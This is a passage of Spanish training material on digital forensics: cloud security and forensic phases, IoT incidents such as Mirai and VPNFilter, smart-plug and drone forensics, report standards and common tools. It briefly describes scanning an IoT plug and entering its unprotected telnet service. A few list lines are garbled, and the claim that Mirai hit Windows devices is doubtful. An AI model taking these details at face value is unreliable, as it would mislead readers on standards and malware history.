La accesibilidad a los datos almacenados en la cloud representa un problema para
cualquier cliente. Las aplicaciones o plataformas de una cloud se implementan sobre
arquitecturas tecnológicas compartidas por multitud de usuarios y clientes. Por tanto,
deben existir medidas que restrinjan y aíslen los datos entre clientes.
Además, el propio proveedor tampoco debería tener acceso al contenido de dichos datos,
por lo que debemos cifrar la información almacenada, tal y como se ha comentado en
el punto anterior.
DISPONIBILIDAD DE LOS DATOS

Un proveedor de servicios cloud debe garantizar la disponibilidad de los datos de los
clientes en todo momento.
Es un problema que un cliente pierda el acceso a sus datos, ya que puede afectar a su
operación y acarrear graves problemas económicos.
Para minimizar el riesgo, se firman contratos de SLA (Service Level Agreement). En estos
contratos se establecen las condiciones de disponibilidad del servicio, así como otros
factores como la calidad (QoS) y el tiempo de respuesta.
En caso de incumplimiento o caída del servicio, generalmente el proveedor se verá
obligado a pagar indemnizaciones por daños y perjuicios.
UBICACIÓN DE LOS DATOS
La ubicación de los datos almacenados influye en cómo puede llegar a ser su gestión.
Cada país tiene una legislación diferente y puede tener una importante repercusión, por
ejemplo, los proveedores de cloud, podrían tener acceso por ley a los datos almacenados,
algo que no se estaría dispuesto a permitir en otro país.

PROTECCIÓN Y RECUPERACIÓN DE LOS DATOS
En el caso de que tenga lugar un incidente en el proveedor cloud y el acceso o la

integridad de los datos se vea afectada, el cliente querrá estar cubierto ante este tipo
de circunstancias. Para ello, se complementan los SLAs con los tiempos de recuperación
(RTO) y la cantidad de datos perdidos tolerables (RPO). Estos datos también deben quedar
reflejados en el contrato con el proveedor, ya que pueden acarrear pérdidas importantes.
2.6. Seguridad lógica y física

SEGURIDAD LÓGICA
Con la evolución de los servicios cloud, existen algunos aspectos a considerar ya que
pueden ser orígenes de vulnerabilidades que pueden poner en riesgo la seguridad en la
nube.
• Virtualización: Actualmente es el servicio más utilizado por sus características

de adaptación, escalabilidad y reducción de costes. Cada plataforma de
virtualización conlleva sus propias medidas de seguridad y configuraciones
específicas. Los hipervisores más comunes son KVM, VMware ESX, y Microsoft
Hyper-V. Deben controlar que un cliente pueda acceder al hipervisor desde
una máquina virtual, a través de alguna vulnerabilidad, además, una
denegación de servicio en una máquina virtual no debe afectar al resto de
máquinas virtuales.
• Hermetismo lógico: Las zonas de seguridad deben permitir la elasticidad de
los recursos de las máquinas virtuales, pero manteniendo el aislamiento entre
ellas. Se pueden emplear firewalls virtuales en las propias maquinas o en otras
nuevas, gestionadas por el cliente, o incluso en el propio hipervisor. A nivel de
comunicaciones, el uso de VLAN (Virtual Local Area Network) nos permitirá
aislar el tráfico de red de dichas máquinas.
• Acceso a los recursos: La implementación de mecanismos de autenticación
multifactor es primordial para el acceso a los recursos. Además, un sistema
basado en roles permitirá gestionar el acceso autorizado a los recursos.
• Auditorías: Deben realizarse auditorías de seguridad para prevenir la
aparición de vulnerabilidades y minimizar el riesgo en caso de un incidente.
Siempre que sea posible, deben realizarse sobre toda la arquitectura cloud,
hipervisores, aplicaciones, código fuente, etc.
SEGURIDAD FÍSICA
Los servicios cloud también deben protegerse ante incidentes y catástrofes físicas.
• Control de acceso: Hay que establecer un sistema de control de acceso

robusto que identifique y autorice a los técnicos que entran y salen de los
centros de datos. Un acceso no autorizado podría derivar en un sabotaje de

la infraestructura.
• Catástrofes naturales: Los centros de datos deben contar con medidas para
luchar contra este tipo de catástrofes. Por ejemplo, empleando alarmas de
incendios, controles de humedad, ventilación, sistemas de seguridad eléctrica,
etc.
• Redundancia: Una de las formas más triviales de mediar contra problemas
hardware es la redundancia. En un centro de datos todos los componentes
de la arquitectura deben estar duplicados, de esta forma, si falla alguno de
ellos, el sistema o la arquitectura podrá seguir funcionando. Además, también
es muy común que los propios centros de datos se encuentren replicados
en distintas ubicaciones geográficas para asegurar que el servicio no se ve
afectado ante una catástrofe.
2.7. Análisis forense en Cloud

El análisis forense en cloud puede llegar a ser algo más complejo debido a la entrada en
escena de más actores, como son los proveedores de servicios cloud (CSP) y los recursos
compartidos entre clientes.
Las fases de adquisición y reporting son las fases de la metodología forense que se verán
más afectadas, ya que, las nuevas tecnologías y procedimientos a aplicar en la nube
para la adquisición de evidencias deberán ser específicos para los entornos cloud.
Ilustración 25. Análisis forense en cloud
2.8. Estrategias de análisis forense en cloud

El análisis forense en entornos cloud tiene muchas similitudes con el análisis tradicional,
aunque en algunas de las actividades o fases se requieren de procedimientos más
específicos.
Dada la dificultad o adversidades que podamos encontrar durante el análisis, es

fundamental que el entorno cloud disponga de una configuración de monitorización y
registro que cumpla unos requisitos mínimos para poder realizar la gestión de un incidente
y análisis forense posterior.
REQUISITOS MÍNIMOS
Se deben definir unos requisitos mínimos a cumplir para poder realizar un análisis forense
en entornos cloud:
• Planificación. La configuración de los recursos de la cloud y los procedimientos

deben contemplar y permitir la gestión de incidentes y los análisis forenses
necesarios para resolver dichos incidentes.
• Conocimiento del entorno. Es fundamental que se disponga de
documentación sobre el despliegue y funcionamiento del entorno. Además,
comprender la arquitectura de estos recursos es crítica para poder realizar la
gestión de incidentes y análisis forenses, por lo que los técnicos deben tener
una formación acorde a las exigencias de la nube.
• Cumplimiento legal. En un entorno cloud, el cumplimiento legal y normativo
es algo más complejo debido a la distribución geográfica, responsabilidad de
los datos y los recursos compartidos. Las legislaciones deben ser analizadas
para evitar problemas posteriores y adaptar el entorno para el cumplimiento
legal necesario, como pueden ser, la RGPD y la directiva europea NIS.
• Rigurosidad. Es importante implementar una metodología que permita
mantener la rigurosidad en cada una de las fases de la que está compuesta.
En los entornos cloud, existen fases algo más complejas que requieren
ser escrupulosos en su ejecución, como pueden ser las fases iniciales de
preparación y adquisición. Además, mantener la cadena de custodia en
estos entornos requiere un mayor esfuerzo.
• Eficiencia. Siempre que sea posible, debemos simplificar el análisis forense.
Por ello, y dado que los recursos humanos y técnicos suelen ser limitados,
debemos adaptarlos para obtener los mejores resultados posibles. En la
nube, el acceso a los datos no es tan trivial durante un forense, las leyes,
disponibilidad de la información, distribución geográfica, etc., dificulta poder
realizar un análisis exhaustivo, por lo que hay que focalizar el esfuerzo en los
recursos disponibles.
DOMINIOS DEL ANÁLISIS FORENSE EN CLOUD.

A la hora de definir una estrategia de análisis forense en entornos cloud, existen unas
áreas o dominios que deben tenerse en cuenta y sobre las que aplican los requisitos
descritos anteriormente:
• Dominio regulatorio. A la hora de realizar un análisis forense debemos tener

en cuenta el marco legal y normativo y que debemos respetar durante
todo el proceso.
Dependiendo del proveedor de servicios y el alojamiento de los recursos,
estos pueden verse afectados por leyes y normativas que impidan el acceso

a los datos. En muchas ocasiones, el principal inconveniente es la poca o
nula colaboración por parte del proveedor de servicios de la cloud.
Además, también puede existir un marco legal que afecte a los clientes.
En ocasiones, también puede darse el caso de que existan acuerdos de SLAs
que dificulten la adquisición de evidencias.
• Dominio organizativo. Para poder realizar un análisis forense en cloud, los
recursos económicos, humanos y técnicos deben garantizarse durante todo el
proceso. Por ello, es necesario asignar los roles y responsabilidades para que
todos puedan trabajar sin bloqueos, así como la definición de procedimientos
y metodologías a emplear.
• Todas las partes involucradas en el análisis forense en cloud, como pueden
ser, el proveedor de servicios, el cliente y los comités de dirección, deben
ser conscientes del trabajo a realizar y deben contribuir para que el análisis
forense pueda finalizar sin dificultades minimizando cualquier tipo de riesgo
técnico o legal.
• Dominio técnico. Los niveles de servicio (IaaS, PaaS, SaaS) van a influir a la
hora de realizar un análisis forense. Dependiendo de qué tipo de servicio se
haya implementado, permitirá al analista adquirir un número mayor o menor
de evidencias, así como la limitación de poder utilizar herramientas forenses
específicas que tengan que ser instaladas y ejecutadas en la infraestructura
cloud del cliente.
De la misma forma, el tipo de cloud escogido también será crucial para
conseguir acceso a los datos a analizar. No es lo mismo trabajar sobre una
cloud privada que sobre una cloud híbrida y multicliente, donde los recursos
compartidos entre clientes pueden verse afectados por alguna normativa que
impida el acceso a los datos.
Por último, las características de las aplicaciones y sistemas operativos sobre
los que se realizará el forense requerirán unos conocimientos específicos
sobre ellos para poder extraer las evidencias pertinentes.
2.9. Fases del análisis forense en cloud

Las fases de un análisis forense en cloud se pueden comparar con las de un análisis
tradicional, aunque ciertas fases podrían ser más complejas o específicas dada la
naturaleza de la nube. A continuación, describiremos las fases de un análisis forense en
cloud.
FASE 1: PREPARACIÓN DEL ENTORNO
En entornos cloud, la capacidad para instalar y utilizar herramientas forenses de terceros
no siempre será posible, dependerá del tipo de cloud, servicio y aspectos legales con los
que nos encontremos.
Debido a esto, es primordial que el entorno cloud esté preparado para que puedan
realizarse análisis forenses, adecuando las herramientas y configuraciones necesarias
para que cuando tenga lugar un incidente, se pueda actuar con rapidez y eficacia.
Teniendo en cuenta los dominios y requisitos de una estrategia de seguridad, debemos
tener presentes los siguientes puntos a la hora de adaptar la cloud para el análisis forense:
• Identificar y cumplir con el marco regulatorio y contractual.

• Involucrar a la Dirección de los actores intervinientes.
• Definir una estrategia, metodología y procedimientos adecuados.
• Formación en materias de ciberseguridad a los clientes. Los analistas
forenses también deben estar formados en las arquitecturas cloud.
• Desplegar herramientas de monitorización de eventos del proveedor cloud.
• Configurar los sistemas para realizar una gestión de logs y capturar los eventos
ocurridos en todos los niveles de la arquitectura cloud. La preservación de los
logs debe estar asegurada en tiempo y almacenamiento.
• Definir los acuerdos de niveles de servicio (SLA).
• Recopilar todos los eventos de seguridad, por ejemplo, de las herramientas
antimalware, IPS/IDS y firewalls, así como los eventos relacionados con el
acceso y autorización (AAA).
• Disponibilidad de una herramienta tipo SIEM para poder consultar y adquirir
evidencias de los eventos ocurridos.
Ilustración 26. Preparación del entorno que afecta a la nube
FASE 2: IDENTIFICACIÓN Y ADQUISICIÓN DE EVIDENCIAS

En esta fase tiene lugar la adquisición de las evidencias reconocidas durante la
identificación.
En un nivel de servicio IaaS, la adquisición de las evidencias por parte del cliente/analista
resulta más trivial y puede seguir la metodología de un análisis forense tradicional. En este
nivel de servicio, el cliente tiene prácticamente todo el control sobre su infraestructura y
los datos almacenados, por lo que la adquisición tan solo dependerá de las herramientas
forenses específicas para entornos cloud, si es que son necesarias.
En cambio, en los servicios de tipo PaaS y SaaS, probablemente necesitemos que el
proveedor de servicios colabore para poder extraer las evidencias ya que, estos modelos
implementan una capa de abstracción que dificulta la recopilación de las mismas.

Durante la adquisición, siempre debemos tener en cuenta el orden de volatilidad de las
evidencias, incluyendo una extensión de los recursos en la nube, como pueden ser los
metadatos del cliente almacenados en el proveedor de servicios en la nube.
Para extraer las evidencias en la nube, podemos hacer uso de las herramientas específicas
para cloud y otras que permitan realizar la adquisición de forma remota conectándose
directamente al recurso, o bien, desplegando algún agente.
De cualquier forma, durante la adquisición debe mantenerse la cadena de custodia
(integridad y marcas de tiempo) para conservar la validez de las evidencias ante un
proceso judicial.
Ilustración 27. Adquisición de evidencias
FASE 3: PRESERVACIÓN DE LAS EVIDENCIAS

La preservación de las evidencias es fundamental para mantener la validez de las
pruebas, así como la disponibilidad de las mismas durante el análisis de la información.
Siempre hay que mantener la cadena de custodia actualizada y controlar el acceso a
las evidencias mediante procesos de identificación, autenticación y autorización. La
asignación de roles y responsabilidades determinará quién debe tener acceso a las
evidencias.
Además, el acceso a los recursos de la nube se realiza a través de conexiones remotas, así
que, siempre que sea posible, las evidencias y copias de seguridad adquiridas deberían
almacenarse en local y no en la nube.
También es necesario realizar las copias de seguridad a partir de las evidencias originales
y almacenarlas en ubicaciones distintas al original, así obtenemos una protección ante
una catástrofe, robo o perdida.
FASE 4: ANÁLISIS DE LAS EVIDENCIAS

En la fase de análisis tiene lugar la investigación de los hechos para esclarecer el caso

forense. Hoy en día, y teniendo en cuenta los servicios cloud, cada vez hay más fuentes a
analizar en busca de evidencias por lo que el número de las mismas se ha incrementado
notablemente.
La nube ofrece la capacidad de realizar el análisis en remoto, gracias a los snaphsots
de las maquinas afectadas por el incidente y a la facilidad de desplegar una máquina
virtual con herramientas forenses en muy poco tiempo, lo que permite realizar un análisis
forense tradicional en la mayoría de las ocasiones.
Sin embargo, también puede ser necesario descargar las evidencias y tratarlas localmente,
sobre todo si van a ser requeridas en un proceso judicial.
Algunas nubes están comenzando a implementar FaaS (Forensics as a Service) o DFaaS
(Digital Forensics as a Service), estos servicios ofrecen un entorno securizado en la nube
con herramientas de adquisición y análisis de evidencias, lo que facilita las actividades
forenses al analista.
Ilustración 28. DFaaS
FASE 5: DOCUMENTACIÓN E INFORMES

En la última fase, se generan los informes con los resultados y se exponen al público
objetivo. No existen diferencias importantes respecto al enfoque clásico, pero si algunas
consideraciones:

• Incluir al proveedor de servicios cloud en la presentación de los resultados.
• Las conclusiones y remediaciones sugeridas puede que no puedan
implementarse en servicios cloud debido a clausulas en contratos o por
afectación a multicliente.
• Si es necesario iniciar acciones legales, hay que revisar las condiciones de
los contratos de los proveedores de servicios ya que, pueden existir clausulas
específicas para estos casos.
• Las evidencias de clientes deben protegerse ante cierto público, como puede
ser, el proveedor de servicios, y también dependiendo del tipo de evidencia,
datos confidenciales o personales.
2.10. Herramientas de análisis forense en cloud

La mayoría de las herramientas forenses pueden emplearse tanto en servicios cloud
como en infraestructuras on-premise, pero hay algunas de ellas que se han diseñado
específicamente para entornos cloud, sobre todo orientadas a la adquisición de
evidencias.
Algunas herramientas específicas para entornos cloud son:
• Cellebrite UFED Cloud Analyzer. Es una herramienta comercial, puede que

la más conocida, que permite adquirir y analizar las evidencias recopiladas
en la nube. Puede obtener evidencias de infinidad de servicios, como redes
sociales, mensajería instantánea, sistemas de almacenamiento, etc.
• Cloud Trail. Esta herramienta forma parte de la cloud de AWS. Permite realizar
un seguimiento de la actividad de los usuarios y el uso de las API.
• FROST. Es una solución de adquisición forense que trabaja a nivel IaaS de
OpenStack. Permite la adquisición de discos virtuales, logs de API y logs de
firewalls de las máquinas virtuales, entre otros.
• OWADE. Es una herramienta forense que permite adquirir los datos de
navegación e historial de un sistema operativo Windows, así como de
las aplicaciones de mensajería y Wi-Fi. Actualmente su desarrollo está
descontinuado.
2.11. Análisis forense en IoT

En los últimos años, Internet of Things (IoT) ha cobrado un interés especial, convirtiéndose
en una de las tecnologías más importantes del siglo.
La capacidad de conectar dispositivos cotidianos (electrodomésticos, coches, relojes,
etc.) a Internet ha mejorado la comunicación entre las personas, los procesos y las “cosas”.

Ilustración 29. IoT
2.12. Internet of Things

IoT se define como una agrupación de dispositivos conectados a una red pública o
privada, interaccionando todos entre sí (machine to machine).
La evolución de Internet y la tecnología ha favorecido que cada vez más, cualquier
dispositivo sea conectado a la red para transmitir e intercambiar información.
Por ejemplo, ya existen frigoríficos que pueden conectarse a Internet, o drones, ropa,
bombillas, cafeteras y todos los dispositivos asociados a la domótica.
En la mayoría de los casos, estos dispositivos no han sido diseñados teniendo en cuenta
las posibles amenazas de la red, por lo que suelen estar conectados sin ninguna
configuración de seguridad.
Este hecho da lugar a que exista una cantidad ingente de dispositivos vulnerables
conectados a Internet, al alcance de cualquiera que pueda sacar provecho ilícito de ellos.
Ilustración 30. Credenciales por defecto
RECOMENDACIONES PARA SECURIZAR IOT

Para poder disminuir el riesgo de los dispositivos IoT conectados a la red de una
organización se deben tener en cuenta las siguientes recomendaciones:

• Identificar, registrar y aprobar la conexión de cualquier dispositivo IoT a la
red corporativa.
• Limitar la conexión a Internet directa para cualquier dispositivo. Deben
implementarse controles intermedios para disminuir la exposición.
• Utilizar redes aisladas y segmentación de red para IoT.
• Realizar auditorías de seguridad sobre los dispositivos IoT.
• Monitorizar las conexiones de red de los dispositivos.
• Redactar políticas de seguridad para cada tipo de dispositivo IoT.
• Revisar la configuración de los dispositivos antes de conectarlos a la red.
• Implementar los mecanismos necesarios para monitorizar la actividad de
los IoT, copias de seguridad de la configuración aplicada, supervisión de las
conexiones de red, etc.
• Registrar y auditar las identidades que tienen acceso a los dispositivos IoT en
cada momento.
• Definir SLA en los contratos con proveedores de dispositivos IoT.
2.13. Incidentes relacionados con IoT

Aunque puede parecer raro, también existen ataques contra dispositivos IoT y malware
específico para ellos. Algunos de los incidentes más conocidos son los detallados a
continuación.
BOTNET MIRAI
Esta botnet fue detectada en 2016 y su objetivo eran los dispositivos IoT, principalmente
routers domésticos y cámaras IP de videovigilancia.
Este malware se aprovechaba de estos dispositivos para realizar ataques de denegación
de servicio distribuidos (DDos) bajo demanda a un objetivo concreto.
Mirai tenía la capacidad de comprometer dispositivos con sistemas operativos Windows
y Linux, por lo que su alcance cubría prácticamente todo el mercado.
Para hacerse con el control de los dispositivos IoT, simplemente rastreaba la red en busca
de dispositivos con credenciales de acceso por defecto (conocidos)). La mayoría de
estos dispositivos se venden con credenciales muy básicas y compartidas, como, por
ejemplo, “admin/admin”.
VPN FILTER
Es otra botnet que en 2018 impactó sobre los routers y NAS de multitud de fabricantes. El
grupo de hackers ruso Fancy Bear fue quien la desarrolló.
Este malware también tenía la capacidad de realizar ataques DDoS contra un tercero.
Además, descargaba un módulo en la maquina infectada con el que podía romper las
comunicaciones seguras entre el usuario y un sitio remoto (man in the middle).
Este ataque tenía un alto impacto en la confidencialidad, ya que le permitía espiar y
extraer información sensible de los usuarios, sin nombrar la afectación que podía tener el

robo de información en el caso de personas influyentes o de organizaciones de interés,
como la industria militar.
Hoy en día, aún siguen existiendo routers infectados y vulnerables a esta botnet, aunque el
FBI ya ha conseguido tomar el control de los servidores que la sostienen para desarticularla.
2.14. Análisis forense en dispositivos IoT

El análisis forense en IoT irá en función de cada tipo de dispositivo o firmware. En muchas
ocasiones será muy complicado realizar un forense e incluso, habrá que emplear técnicas
hardware de bajo nivel para poder obtener algo de información. Veamos algunos
ejemplos a continuación.
ANÁLISIS FORENSE EN DRONES

Los drones son unos dispositivos que cada vez están más de moda. Los de gama media
y alta son los más interesantes, ya que pueden ser utilizados para realizar actividades
mucho más complejas, como reparto de pedidos, sobrevolar zonas de catástrofes
naturales y misiones militares.
Los drones tienen una memoria interna operando sobre un sistema operativo Linux en la
mayoría de los casos, donde se almacena información sobre zonas de exclusión aérea,
rutas y coordenadas. También suelen disponer de una tarjeta externa extraíble tipo SD
a la que podremos acceder directamente o desmontando alguna carcasa del dron y
así llegar a los datos almacenados, como videos o fotografías en sí, o a los metadatos
que aportan éstas (que serán útiles para obtener datos de posicionamiento, fechas de
evidencias, horarios…).
En la mayoría de los casos, podremos acceder a estas memorias a través de una conexión
USB, lo que facilita la adquisición de evidencias para un análisis forense.
En el caso de aquellos modelos con mando, también es deseable poder acceder a él.
Igualmente ocurre con el móvil asociado al dron, pero en este caso, basta con realizar un
análisis forense móvil tal y como ya conocemos.
Ilustración 31. Dron Phantom 2

ANÁLISIS FORENSE EN ENCHUFES INTELIGENTES
Uno de los dispositivos más IoT más comercializados son los enchufes inteligentes. Estos
tipos de enchufes se conectan a la red y se pueden administrar de forma remota.
Por ejemplo, podemos realizar las siguientes operaciones desde nuestro teléfono móvil:
• Encender/Apagar el dispositivo conectado al enchufe.

• Acceder y operar con el enchufe desde el móvil, Amazon Alexa, Google
Assistant, etc.
• Programar horarios de encendido/apagado.
Uno de los principales fabricantes de estos tipos de elementos es “Meross”, que está
especializado en domótica. Si tenemos en cuenta uno de sus dispositivos, por ejemplo,
el enchufe “Smart Plug”, un análisis forense estaría enfocado a realizar la adquisición y
análisis teniendo en cuenta sus características particulares (como hemos adelantado,
cada forense en IoT dependerá de las particularidades de cada dispositivo)
Para operar con “Smart Plug”, necesitaremos instalar su aplicación en nuestro dispositivo
móvil, en este caso, tendremos que realizar un forense al móvil y a la aplicación.
Si nos centramos en el propio dispositivo, este tendrá un direccionamiento IP asignado
para poder conectarse a la red e Internet.
Podemos lanzar una herramienta de análisis de puertos sobre la IP del dispositivo para
descubrir los servicios que está ejecutando. El “Smart Plug” dispone de un servidor web y
un telnet.
Podremos acceder al servidor web a través de un navegador, incluso podremos hacer
un descubrimiento de recursos, como la página de firmware o la de login y extraer la
configuración del dispositivo, así como los registros de logs si los tuviera.
Al servidor de telnet podemos conectarnos a través de un cliente telnet y, descubriremos
que el acceso no está protegido por contraseña en la mayoría de los casos. Una vez
dentro, podemos acceder a los directorios del sistema operativo y extraer todas las
evidencias que podamos.
2.15. Informes de análisis forense

Los informes de análisis forenses e informes periciales consisten en la redacción de
todo el proceso de análisis forense que ha sido llevado a cabo.
Dichos informes deben tener una estructura lógica y un lenguaje comprensible para el
público objetivo.
Además, los informes periciales y forenses podrán ser utilizados en causas judiciales
para valorar las evidencias digitales.

Ilustración 32. Documentos e informes
2.16. Contenido del informe y marcos de referencia
CONTENIDO DEL INFORME

El informe forense informático debe estar compuesto por, al menos, los siguientes
bloques de información:
• Datos de identificación personal del analista o perito forense. También se

pueden incluir aquellos relacionados con la formación y que acrediten la
experiencia del analista.
• Descripción del objetivo del análisis forense y el alcance del trabajo realizado.
• Metodología y procedimientos seguidos durante el análisis.
• Las conclusiones del resultado del análisis forense.
MARCOS DE REFERENCIA PARA LA REDACCIÓN DE INFORMES

No existe una norma o marco de referencia único y obligatorio para la redacción de un
informe forense, pero sí que, según las circunstancias, deben ser redactados teniendo en
cuenta alguna de las siguientes normas.
Algunos de los estándares que pueden ser utilizados en la redacción de análisis forenses
y periciales son:
• UNE 197010:2015: Criterios generales para la elaboración de informes

y dictámenes periciales sobre Tecnologías de la Información y las
Comunicaciones (TIC)
• UNE 71505-1:2013: Tecnologías de la Información (TI). Sistema de Gestión
de Evidencias Electrónicas (SGEE). Parte 1: Vocabulario y principios
generales
de Evidencias Electrónicas (SGEE). Parte 2: Buenas prácticas en la gestión
de las evidencias electrónicas
de Evidencias Electrónicas (SGEE). Parte 3: Formatos y mecanismos
técnicos

• UNE 71506:2013: Tecnologías de la Información (TI). Metodología para el
análisis forense de las evidencias electrónicas
• UNE-EN ISO/IEC 27037:2016: Tecnología de la información. Técnicas de
seguridad. Directrices para la identificación, recogida, adquisición y
preservación de evidencias electrónicas (ISO/IEC 27037:2012)
• UNE-EN ISO/IEC 27042:2016: Tecnología de la información. Técnicas
de seguridad. Directrices para el análisis y la interpretación de las
evidencias electrónicas (ISO/IEC 27042:2015).
2.17. Estructura de un informe forense: Índice general

El informe forense debe ser redactado para que pueda ser interpretado por cualquier
otro analista forense o perito, necesario sobre todo en procesos judiciales. Además, el
lenguaje debe ser claro y conciso, empleando la nomenclatura y terminología adecuada
para un análisis forense digital.
Como hemos comentado, un informe puede estar condicionado por un estándar UNE
o por cualquier otra norma, en este caso, detallaremos la estructura para un informe
basado en el estándar UNE 157001 (Criterios generales para la elaboración de proyectos)
para proyectos técnicos, como es el caso de un análisis forense digital.
Teniendo en cuenta el estándar anterior, el informe debe constar de los siguientes
documentos:
• Índice general.
• Memoria.
• Anexos.
El índice general se utiliza para indexar y enumerar cada uno de los apartados y
documentos de los que consta el informe forense.
No existe una distinción diferente o especial para el índice, pudiéndose emplear un
formato donde se indique el número de página para cada entrada del índice, tal y como
estamos acostumbrados a ver en libros, revistas y otros informes.
Ilustración 33. Informe forense

2.18. Estructura del informe: Memoria
La memoria es la parte central del informe forense donde tiene lugar el desarrollo de los
antecedentes, metodologías y conclusiones del análisis realizado. Constituye la esencia
del dictamen pericial informático que puede ser solicitado en una causa judicial.
A su vez, la memoria está compuesta por los siguientes apartados:
• Hoja de identificación. En esta primera sección se indica el título del informe
y el código identificativo. También se indican los datos (personales y
profesionales) del solicitante del informe, así como los datos correspondientes
al analista que ha realizado el análisis.
• Índice de la memoria. Referencia indexada a todos los documentos y
apartados de la memoria.
• Objeto del informe pericial. Se debe detallar cual es el objetivo del análisis
forense realizado.
• Alcance del informe. Identificación del ámbito, entorno y alcance del análisis
forense.
• Antecedentes al estudio. Para que un tercero pueda comprender la totalidad
de las tareas realizadas durante el análisis forense, se deben incluir los estudios
y los detalles teóricos/técnicos para facilitar la comprensión del dictamen.
• Normas y referencias. En esta sección se indican las normativas, estándares
y leyes que han influido en el dictamen, así como cualquier otro tipo de
referencias documentales que se consideren de interés.
• Definiciones y abreviaturas. Se corresponde con los significados o definiciones
de los términos empleados en el informe.
• Requisitos del informe pericial. Se incluyen las condiciones que han afectado
al análisis forense derivadas de legislaciones o normativas aplicables, así
como los requisitos establecidos por el solicitante del dictamen.
• Análisis de soluciones. Se indica el detalle de las posibles alternativas
analizadas y el proceso que ha tenido lugar para elegir la alternativa óptima
que cumple con el objetivo del dictamen.
• Resultados finales del dictamen. En este apartado final de la memoria se
describen de forma resumida todo el proceso de análisis forense para finalizar
con la enumeración de las conclusiones justificadas en función del análisis
realizado.
2.19. Estructura del informe: Anexos

La parte final del informe forense está constituida por los anexos.
El anexo está compuesto por todos los documentos que son referenciados en la memoria
y que permiten mejorar la comprensión del dictamen.
Generalmente, se pueden encontrar al menos dos documentos en los anexos:
• Documentación previa. Se incluyen todos los documentos que han definido

algún tipo de requisito previo a la realización del análisis forense, como
normativas, atestados policiales, condiciones del entorno, etc.
• Intervención y estudio de evidencias digitales. Este anexo se asocia con

la descripción detallada del proceso de adquisición, preservación y análisis
de las evidencias digitales durante el proceso de análisis forense. Tampoco
debemos olvidar incorporar los registros de la cadena de custodia de todas
las evidencias adquiridas.
Ilustración 34. Proceso forense
2.20. Herramientas forenses

Los análisis forenses digitales necesitan tecnología para poder hacer frente al estudio de
los casos. Para ello, un analista se debe apoyar en las diversas herramientas existentes en
el mercado que le permitan llevar a cabo el análisis.
Un analista necesita conocer las principales herramientas que le pueden ser útiles en
cada situación. Del buen uso de ellas va a depender en gran medida la resolución de un
caso forense digital.
2.21. Recuperación de ficheros

Una de las tareas más comunes en los análisis forenses es la detección e identificación
de ficheros eliminados del sistema.
Existen multitud de herramientas para realizar estas tareas, pero vamos a destacar las
siguientes.
FOREMOST Y SCALPEL
Foremost es una herramienta open source que fue desarrollada por la Oficina de
Investigaciones Especiales de las Fuerzas Aéreas estadounidenses. Se utiliza para
recuperar ficheros de sistemas de archivos a través de técnicas de “file carving”.
Scalpel fue desarrollada a partir de Foremost mejorando su eficiencia, también es open
source y funciona bajo sistemas GNU/Linux y Mac. Scalpel permite recuperar ficheros
eliminados en multitud de sistemas de archivos (FAT, NTFS, EXT, HFS+, etc.), también
mediante técnicas de “file carving”.

Foremost tiene una limitación, y es que, no puede reconstruir un fichero de más de 2GB,
aunque tampoco es muy común encontrarse con este tipo de archivos, sobre todo si lo
que estamos buscando son documentos ofimáticos.
RECUVA
Recuva es un software de recuperación de ficheros eliminados que trabaja sobre sistemas
operativos Microsoft Windows. Es capaz de identificar ficheros en sectores del disco que
han sido marcados como espacio libre, recuperándolos rápidamente.
También tiene capacidad de buscar ficheros a través de file carving, lo que la convierte
en una herramienta muy versátil y empleada en análisis forense.
Su licencia es gratuita, pero con limitaciones. Existen otras versiones de pago que amplían
su alcance y características a un precio muy asequible.
Ilustración 35. Recuva
2.22. Análisis de procesos

Cuando hablamos de análisis forense, puede que lo primero que se nos venga a la mente
sea el análisis sobre discos duros y servidores, y en la mayoría de los casos, desconectados
y apagados.
Una rama muy importante en la actualidad es el análisis forense enfocado a la gestión
de incidentes y al análisis de malware.
Si necesitamos analizar el comportamiento de un malware o software malicioso,
tendremos que monitorizar muchos puntos del sistema, y uno de los más importantes
son los procesos del sistema. Para ello, podemos contar con ProcMon.
ProcMon es una herramienta de monitorización para Microsoft Windows capaz de
identificar en tiempo real los cambios realizados en el sistema de ficheros, en el registro
de Windows y en los procesos del sistema.
Tiene una capacidad de monitorización muy potente, por lo que es usada ampliamente
para resolver problemas del sistema y para el análisis de malware.
A través de su configuración, es posible definir filtros para simplificar la monitorización ya

que, de lo contrario, el alcance del análisis sería excesivo.
Forma parte de la suite Sysinternals, un clásico de las herramientas de troubleshooting
de sistemas Microsoft Windows.
Recientemente, Microsoft ha desarrollado una herramienta similar para sistemas
operativos Linux denominada de igual forma. Aunque son incompatibles debido a las
diferencias de la arquitectura de estos sistemas, ha sido implementada para lograr una
herramienta de iguales características que la original.
Fig. 3. ProcMon
2.23. Análisis y recolección de logs

El análisis de los logs es otra de las tareas más importantes en un análisis forense. En ellos
podemos encontrar las causas que ha llevado a una infección con malware del sistema,
a un acceso no autorizado o simplemente, el funcionamiento anómalo de una aplicación
o del sistema.
En una organización, lo normal es que los logs se envíen a un sistema centralizado de
logs, por lo que tendremos acceso a todos ellos fácilmente.
El siguiente problema con el que nos toparemos es encontrar las evidencias entre tal
cantidad de logs. Generalmente se utilizan funciones de búsqueda y patrones para
agilizar el análisis. Algunos de estos comandos en entornos Linux son “find” y “grep”.
Si estos logs son reenviados a un SIEM, la tarea de análisis posiblemente sea más sencilla

gracias a las reglas de correlación de eventos que mantienen estos sistemas.
Existen otras alternativas como Elasticsearch, Logstash y Kibana. Esas herramientas en
conjunto, conocida como “ELK”, implementan una plataforma de recolección de eventos,
almacenamiento y visualización:
• Logstash: Es un pipeline de procesamiento de datos del lado de servidor que

recoge los eventos de las fuentes de información configuradas (logs), les
aplica un formato definido por el usuario y los envía a un sistema remoto para
su explotación posterior.
• Elasticsearch: Es un motor de búsqueda open source y distribuido basado en
json. Dispone de una API RESTful para poder interactuar con él a través de
consola o integrarlo con otras herramientas. Sus características principales
son su escalabilidad, velocidad y capacidad analítica.
• Kibana: Es la herramienta de visualización y gestión de los datos indexados
en Elasticsearch. Es capaz de mostrar histogramas en tiempo real y multitud
de tipos de gráficos. A través de Kibana, también se realiza la configuración y
gestión de los clusters de datos de Elasticsearch.
Ilustración 36. ELK
Otra plataforma con características similares y que actualmente está muy extendida
es Splunk. Esta herramienta está más enfocada a ciberseguridad, siendo utilizada
comúnmente como un SIEM.
2.24. Análisis forense de red

El análisis forense de red monitoriza los paquetes y estudia la actividad del tráfico de la red
para detectar posibles intrusiones o presencia de malware en los sistemas conectados
a la red.
Este análisis forense es llevado a cabo por herramientas especializadas como son los
sniffers de red, los cuales pueden capturar todo el tráfico de la red, o bien, mediante TAP
